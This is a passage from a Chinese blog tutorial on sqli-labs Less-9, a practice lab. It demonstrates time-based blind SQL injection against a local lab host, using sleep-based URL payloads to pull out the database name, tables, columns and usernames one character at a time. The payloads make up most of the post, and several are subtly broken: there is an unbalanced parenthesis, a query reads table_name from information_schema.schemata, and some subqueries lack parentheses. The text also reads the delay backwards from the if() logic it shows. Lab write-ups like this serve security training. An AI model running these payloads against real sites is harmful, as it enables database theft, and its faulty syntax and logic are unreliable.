sqli-labs ————less -9

Less-9

首先我们可以查看一下源代码:


一方面:从标题中我们可以看到这是一个基于时间盲注的单引号注入

另一方面:从之后的“print_r(mysql_error());”来看我们并不可以使用报错注入

最后,我们可以看到可以通过' and 1=1 --+或者' or 1=1 --+来绕过


既然如此,那么我就用延迟注入的方式来注入:

猜解数据库:

payload:http://192.168.11.136/sqli-labs/Less-9?id=1' and if(ascii(substr(database(),1,1))=115),1,sleep(5))--+


从图中可以看到发送了时间延迟,所以猜解正确,所以数据库第一位是“s”

至于后续的猜解与这一个原理相同,这里就不再多说了!最后我们可以猜解到数据库的名称为security。

猜解security的数据表名

http://192.168.11.136/sqli-labs/Less-9/?id=1' and if(ascii(substr(select table_name from information_schema.schemata where table_schema='security' limit 0,1))=101,1,sleep(5))--+


猜测第一个数据表的第一位是e,之后的类似,最后我们可以得到emails

猜测user表的列

http://192.168.11.136/sqli-labs/Less-9?id=1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' limit 0,1))=101,1,sleep(5))--+


猜测users表的第一个列的第一个字符是i,之后的类推即可!可以得到列名id,username,password

猜测username的字段值

http://192.168.11.136/sqli-labs/Less-9/?id=1' and if(ascii(substr(select username from users  limit 0,1))=68,1,sleep(5))--+


之后的内容以此类推就好!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值